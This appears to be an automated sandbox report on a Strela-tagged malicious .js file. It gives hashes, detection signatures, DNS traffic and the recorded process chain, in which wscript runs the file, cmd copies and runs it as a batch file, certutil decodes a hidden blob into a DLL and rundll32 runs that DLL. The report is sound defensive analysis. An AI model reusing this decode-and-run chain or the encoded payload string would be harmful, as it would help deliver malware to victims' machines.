Analysis Overview
SHA256
d910b9c7e64514dbbceb22bae74790984731877c5e45f06d9e716ae48e1b986a
Threat Level: Known bad
The file 9573_21597333807.js was found to be: Known bad.
Malicious Activity Summary
Strela
Loads dropped DLL
Checks computer location settings
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-16 12:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-16 12:22
Reported
2024-02-16 12:24
Platform
win7-20240215-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Strela
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js" "C:\Users\Admin\\calculatingmomentous.bat" && "C:\Users\Admin\\calculatingmomentous.bat"
C:\Windows\system32\fc.exe
fC /T4eeVbmZfDnqfE6altiBwHwxa65U9VwYvU8GACmozE1T+mx9zNgllyagqUQAXZdO4MUE/D0TLrxhcEShk0LMrRAQPdduJL0cMA3aenydMBypmg7UeZw8NWayoKmw2I2WyqixTBCxlo5MLch82SrObIVI4NHG/jG8zbpifp6eov6SXv4C0oo6BtqM7A3x52F5SWHJmNh0KxZoT1KkC1Lavyj8BvY6ni7a+oxslTkPfSENOaFpAVXc0YKElXZdpYg9dnjLslGoK/KZptLx0LEYl+LUx0aqCZ12kcXdPXgR2cGAz4IEydowd56sXm7Z8FTFEQGqNWDoWGjohBQdWTNlhWm54Rn9HA2NET2ZdajZ1knBfAHGNK+SQ3EVea21UOj9IQjM/f38CeCppaChTEzuAt09hCgtdThIOQn8tVl5DVRV6SFV1LldrexNcbEk/f3RhTmpDBc9uWhxsB/OAAWp6qDXukjm4u3cEciUpYX3CeWZCRXp2fl838IpITVZGcimFjD6xEd+dcAh/YlNTdHphi5yRnLewt5GpsBk4XWfNXk9zRXM2CjLlghjYgTT0lpjAJTGxg5alibKuLglMcMxmf2xFYm9VbxNssRtYjkJfF1ODCfmFTDfekXe4ulwRWwvOjxHZrLxtSK9ReXhpKn15WhfDrANPrAjupyajqHQqKE91UqVbACQLGzs+AG5/7X1QSVlCRno/bUhCSkljF0OwSHIpVK8E6IHSbWhNYGE4KEdaJiBJbSNiLmpyFFAgJoS7cUAhH39SLjhIYwJaU1d9EFdbQWsBXU9yBF1VezxNf1NYb1Ya9VdPGmAPz4QFbkS9HtGsJYmSYzRfKxVUZNpiQ1BAfE5zfxPTmU9cTndxMY2MKook3o5CNFlzbkpvSGqcvJaWtHx5Qkmzi6WEHHxVWENuR8Msd1K7NFZMfquhpKvaTnB8k6SrKMwbQG4S5SFXcwPxCUVzBCn9sGcT2KnVtrO1fGJOKW2mBPaqNtm4HHgI43IF5Y4k7vOma0lpAkuXJE9BYS5BK/CceQh8qC+LeqMY+Qd7QwrgJ
C:\Windows\system32\findstr.exe
findstr /V airpuny ""C:\Users\Admin\\calculatingmomentous.bat""
C:\Windows\system32\certutil.exe
certutil -f -decode condemnedtoothsome crosssugar.dll
C:\Windows\system32\rundll32.exe
rundll32 crosssugar.dll,main
Network
Files
C:\Users\Admin\calculatingmomentous.bat
| MD5 | 8b5f798bc01985c75d37510670f046b8 |
| SHA1 | dc65db3178e9089186160059399ee85cb61e487e |
| SHA256 | d910b9c7e64514dbbceb22bae74790984731877c5e45f06d9e716ae48e1b986a |
| SHA512 | 5bd7e9da95587597e1f78cc8e4ac2fcd4fbca281116097b20ac4a5bc579d2ddfc6cb6c678f12f27c621616bc9819be8ae9dd91169a483c7ffa5ce6c8e3dc5312 |
C:\Users\Admin\condemnedtoothsome
| MD5 | a0fefffb0db449a46b243012f1beb383 |
| SHA1 | d6fff628baafed3dff7d2e19c78036b7cd0ea41d |
| SHA256 | faf1adbc627a95eb5879f5ecc6768db7892e11f466304420db9200bf32032e05 |
| SHA512 | b6d29a56b19e20868ea56b381c53f49e8111d190edaa17ad8c91e4d4eeeb9ab74e1f92df886ea4e3078f014509c08d1301f3a3f590a2af53beab573a117604be |
C:\Users\Admin\crosssugar.dll
| MD5 | 1d9e331af631be2b1d5f6e5816afddd0 |
| SHA1 | b8d9864f1c15f4692cde377f4f63804a68f3b7d1 |
| SHA256 | 34eec1db863d20eeba7568a74b64ddc2c6510762c6ff59a4a00e3d5a70d68fa7 |
| SHA512 | 771ab41d4d361a000d0a76077098a7d8e63d6375d1dfdedf9e916508a8a5455260e839439babbf6e2500581c0e65b21eb22649e1b8c8db467603229c3c001ab0 |
memory/1660-1830-0x000007FEF6330000-0x000007FEF6492000-memory.dmp
memory/1660-1831-0x00000000004A0000-0x00000000004C3000-memory.dmp
memory/1660-1832-0x00000000004A0000-0x00000000004C3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-16 12:22
Reported
2024-02-16 12:24
Platform
win10v2004-20231222-en
Max time kernel
144s
Max time network
146s
Command Line
Signatures
Strela
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1460 wrote to memory of 3916 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 1460 wrote to memory of 3916 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 3916 wrote to memory of 540 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\fc.exe |
| PID 3916 wrote to memory of 540 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\fc.exe |
| PID 3916 wrote to memory of 2832 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\findstr.exe |
| PID 3916 wrote to memory of 2832 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\findstr.exe |
| PID 3916 wrote to memory of 3764 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 3916 wrote to memory of 3764 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 3916 wrote to memory of 4584 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 3916 wrote to memory of 4584 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\rundll32.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js" "C:\Users\Admin\\calculatingmomentous.bat" && "C:\Users\Admin\\calculatingmomentous.bat"
C:\Windows\system32\fc.exe
fC /T4eeVbmZfDnqfE6altiBwHwxa65U9VwYvU8GACmozE1T+mx9zNgllyagqUQAXZdO4MUE/D0TLrxhcEShk0LMrRAQPdduJL0cMA3aenydMBypmg7UeZw8NWayoKmw2I2WyqixTBCxlo5MLch82SrObIVI4NHG/jG8zbpifp6eov6SXv4C0oo6BtqM7A3x52F5SWHJmNh0KxZoT1KkC1Lavyj8BvY6ni7a+oxslTkPfSENOaFpAVXc0YKElXZdpYg9dnjLslGoK/KZptLx0LEYl+LUx0aqCZ12kcXdPXgR2cGAz4IEydowd56sXm7Z8FTFEQGqNWDoWGjohBQdWTNlhWm54Rn9HA2NET2ZdajZ1knBfAHGNK+SQ3EVea21UOj9IQjM/f38CeCppaChTEzuAt09hCgtdThIOQn8tVl5DVRV6SFV1LldrexNcbEk/f3RhTmpDBc9uWhxsB/OAAWp6qDXukjm4u3cEciUpYX3CeWZCRXp2fl838IpITVZGcimFjD6xEd+dcAh/YlNTdHphi5yRnLewt5GpsBk4XWfNXk9zRXM2CjLlghjYgTT0lpjAJTGxg5alibKuLglMcMxmf2xFYm9VbxNssRtYjkJfF1ODCfmFTDfekXe4ulwRWwvOjxHZrLxtSK9ReXhpKn15WhfDrANPrAjupyajqHQqKE91UqVbACQLGzs+AG5/7X1QSVlCRno/bUhCSkljF0OwSHIpVK8E6IHSbWhNYGE4KEdaJiBJbSNiLmpyFFAgJoS7cUAhH39SLjhIYwJaU1d9EFdbQWsBXU9yBF1VezxNf1NYb1Ya9VdPGmAPz4QFbkS9HtGsJYmSYzRfKxVUZNpiQ1BAfE5zfxPTmU9cTndxMY2MKook3o5CNFlzbkpvSGqcvJaWtHx5Qkmzi6WEHHxVWENuR8Msd1K7NFZMfquhpKvaTnB8k6SrKMwbQG4S5SFXcwPxCUVzBCn9sGcT2KnVtrO1fGJOKW2mBPaqNtm4HHgI43IF5Y4k7vOma0lpAkuXJE9BYS5BK/CceQh8qC+LeqMY+Qd7QwrgJ
C:\Windows\system32\findstr.exe
findstr /V airpuny ""C:\Users\Admin\\calculatingmomentous.bat""
C:\Windows\system32\certutil.exe
certutil -f -decode condemnedtoothsome crosssugar.dll
C:\Windows\system32\rundll32.exe
rundll32 crosssugar.dll,main
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\calculatingmomentous.bat
| MD5 | 8b5f798bc01985c75d37510670f046b8 |
| SHA1 | dc65db3178e9089186160059399ee85cb61e487e |
| SHA256 | d910b9c7e64514dbbceb22bae74790984731877c5e45f06d9e716ae48e1b986a |
| SHA512 | 5bd7e9da95587597e1f78cc8e4ac2fcd4fbca281116097b20ac4a5bc579d2ddfc6cb6c678f12f27c621616bc9819be8ae9dd91169a483c7ffa5ce6c8e3dc5312 |
C:\Users\Admin\condemnedtoothsome
| MD5 | a0fefffb0db449a46b243012f1beb383 |
| SHA1 | d6fff628baafed3dff7d2e19c78036b7cd0ea41d |
| SHA256 | faf1adbc627a95eb5879f5ecc6768db7892e11f466304420db9200bf32032e05 |
| SHA512 | b6d29a56b19e20868ea56b381c53f49e8111d190edaa17ad8c91e4d4eeeb9ab74e1f92df886ea4e3078f014509c08d1301f3a3f590a2af53beab573a117604be |
C:\Users\Admin\crosssugar.dll
| MD5 | 1d9e331af631be2b1d5f6e5816afddd0 |
| SHA1 | b8d9864f1c15f4692cde377f4f63804a68f3b7d1 |
| SHA256 | 34eec1db863d20eeba7568a74b64ddc2c6510762c6ff59a4a00e3d5a70d68fa7 |
| SHA512 | 771ab41d4d361a000d0a76077098a7d8e63d6375d1dfdedf9e916508a8a5455260e839439babbf6e2500581c0e65b21eb22649e1b8c8db467603229c3c001ab0 |
memory/4584-1827-0x00007FFE7B800000-0x00007FFE7B962000-memory.dmp
memory/4584-1828-0x000002575DD30000-0x000002575DD53000-memory.dmp
memory/2472-1829-0x000001DECB4A0000-0x000001DECB4B0000-memory.dmp
memory/2472-1845-0x000001DECB5A0000-0x000001DECB5B0000-memory.dmp
memory/2472-1861-0x000001DED3910000-0x000001DED3911000-memory.dmp
memory/2472-1863-0x000001DED3940000-0x000001DED3941000-memory.dmp
memory/2472-1864-0x000001DED3940000-0x000001DED3941000-memory.dmp
memory/2472-1865-0x000001DED3A50000-0x000001DED3A51000-memory.dmp